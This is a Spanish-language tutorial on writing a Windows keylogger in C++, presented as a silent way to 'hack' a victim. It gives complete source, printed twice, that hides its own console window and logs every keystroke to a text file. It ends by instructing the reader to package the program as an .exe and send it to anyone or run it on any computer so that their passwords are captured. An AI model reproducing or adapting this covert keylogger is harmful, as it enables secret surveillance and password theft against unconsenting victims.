
Ventajas de usar un Keylogger:
- Es un método muy simple y fácil de llevar a cabo.
- Es un ataque silencioso ya que la victima no se dará cuenta que esta siendo hackeada.
Como crear un Keylogger usando C++:
- Requisitos:
- Dev C++. Puedes descargarlo aquí: http://www.bloodshed.net/
- Instrucciones:
1. Instalar Dev C++ y ejecutarlo.
2. Dirigirse a File->New->Source File
3. A continuación, pegar el siguiente código en el espacio de trabajo en blanco.
#include <iostream>
using namespace std;
#include <windows.h>
#include <winuser.h>
int Save (int key_stroke, char *file);
void Stealth();
int main()
{
Stealth();
char i;
while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt");
}
}
system ("PAUSE");
return 0;
}
/* *********************************** */
int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;
FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");
cout << key_stroke << endl;
if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);
fclose (OUTPUT_FILE);
return 0;
}
/* *********************************** */
void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,0);
}
using namespace std;
#include <windows.h>
#include <winuser.h>
int Save (int key_stroke, char *file);
void Stealth();
int main()
{
Stealth();
char i;
while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt");
}
}
system ("PAUSE");
return 0;
}
/* *********************************** */
int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;
FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");
cout << key_stroke << endl;
if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);
fclose (OUTPUT_FILE);
return 0;
}
/* *********************************** */
void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,0);
}
4. Compilar el código, y para eso nos dirigimos a la ventana Execute y le damos a Compile (Ctrl+F9)
Cuando le den a Compile, verán algo como esto:
5. Cuando terminen, nos dirigimos a el directorio donde guardamos el programa ya compilado y veremos estos archivos, dentro de los cuales, estará el programa y un archivo de texto log.txt
6. Este archivo .txt es en donde se guardaran las teclas que se presionen mientras el programa se esta ejecutando. Lo único que nos queda es unir estos dos archivos en un .exe y mandarlo a quien queramos o ejecutarlo en el ordenador que queramos y todas sus contraseñas quedaran registradas!